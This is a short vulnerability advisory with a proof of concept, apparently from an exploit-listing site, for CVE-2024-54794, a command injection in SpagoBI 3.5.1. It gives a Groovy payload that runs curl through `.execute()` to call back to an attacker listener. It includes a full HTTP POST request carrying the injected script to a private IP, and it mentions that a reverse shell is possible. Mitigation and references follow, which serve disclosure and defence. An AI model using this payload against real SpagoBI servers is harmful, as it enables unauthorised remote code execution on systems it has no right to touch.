Share
## https://sploitus.com/exploit?id=1337DAY-ID-39885
# CVE-2024-54794

**Severity :** **Critical** (**9.1**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` 

## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **Command Injection** vulnerability in the script input feature.

## Poc
In the Poc the attacker has to be logged into the webapp and write a groovy script that is able to execute os commands. 
For this Poc http interaction was reproduced. A reverse shell is possible. 
### Steps to Reproduce :
1. Up a webserver for example in linux with: **python3 -m http.server 80**
2. Once having access to the script insertion panel choose grovy as language and insert via gui test the script inserting:
   ```println+"curl+your_ip".execute()```

Request example after testing the connection :

```html
POST /SpagoBI/servlet/AdapterHTTP?LIGHT_NAVIGATOR_DISABLED=true&PAGE=detailModalitiesValuePage HTTP/1.1
Host: <host>
Cookie: <cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/131.0.2903.86
Content-type: application/x-www-form-urlencoded

id=8&MESSAGEDET=DETAIL_MOD&lovProviderModified=true&testLovBeforeSave.x=10&testLoveBeforeSave.y=14&label=test2&name=test2&description=test2&input_type=SCRIPT%2C2&datasource=TopView&queryDef=&LANGUAGESCRIPT=groovy&SCRIPT=println+%22curl+10.246.6.140%22.execute%28%29.test&javaClassName=&valueOfFixedLovItemNew=&dataset=&datasetReadLabel=
```

## Affected Version Details :

- <= 3.5.1

## Impact :

The attacker, if having access to the webapp with such grants to write scripts, can execute arbirary code without restriction on the machine.

## Mitigation :

- Disable the script input form. Update to the latest version. 
  
## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-54794